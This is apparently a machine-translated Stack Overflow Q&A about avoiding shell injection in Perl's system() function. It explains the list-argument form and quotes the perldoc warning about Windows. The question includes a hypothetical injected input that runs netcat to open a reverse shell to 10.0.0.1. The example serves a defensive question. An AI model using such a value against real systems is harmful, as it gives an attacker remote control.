system()是一个执行带有 args 'n' 的文件的函数,表示 'n' 是一个实数。
如果我们有:system("path/to/program","firstArg","secondArg",...);第二个参数中的字符串将始终是传递给 "path/to/program" 的字符串。对?
如果我喜欢:system("path/to/program","legitArg",$userinput); - 做$userinput容易受到代码注入(inject)的影响?或者它将作为字符串传递给 path/to/program ?
即使$userinput="some_kind_of_escape /bin/nc -e /bin/sh 10.0.0.1 1234" ?
如果不是,我该如何参数化这些论点?
更新 :根据下面的答案,我从斯坦福找到了这个:using the perl system() function
最佳答案
这(几乎)是避免 shell 注入(inject)的正确用法,因为 Perl 将使用 execvp直接执行给定程序,而不通过命令外壳传递参数。
来自 perldoc system :
If there is more than one argument in LIST, or if LIST is an array with more than one value, starts the program given by the first element of the list with arguments given by the rest of the list. If there is only one scalar argument, the argument is checked for shell metacharacters, and if there are any, the entire argument is passed to the system's command shell for parsing (this is "/bin/sh -c" on Unix platforms, but varies on other platforms). If there are no shell metacharacters in the argument, it is split into words and passed directly to "execvp", which is more efficient. On Windows, only the "system PROGRAM LIST" syntax will reliably avoid using the shell; "system LIST", even with more than one element, will fall back to the shell if the first spawn fails.
请注意关于
system LIST 的警告对比 system PROGRAM LIST在 Windows 系统上,所以如果你的代码要在那里运行,你应该使用:system {"path/to/program"} "program-name", "legitArg", $userInput;
当然,如果正在执行的程序采用用户提供的参数并将其传递给 shell 本身,那么没有任何东西可以保护您。
关于perl - 避免系统 perl 函数中的代码注入(inject),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/35887613/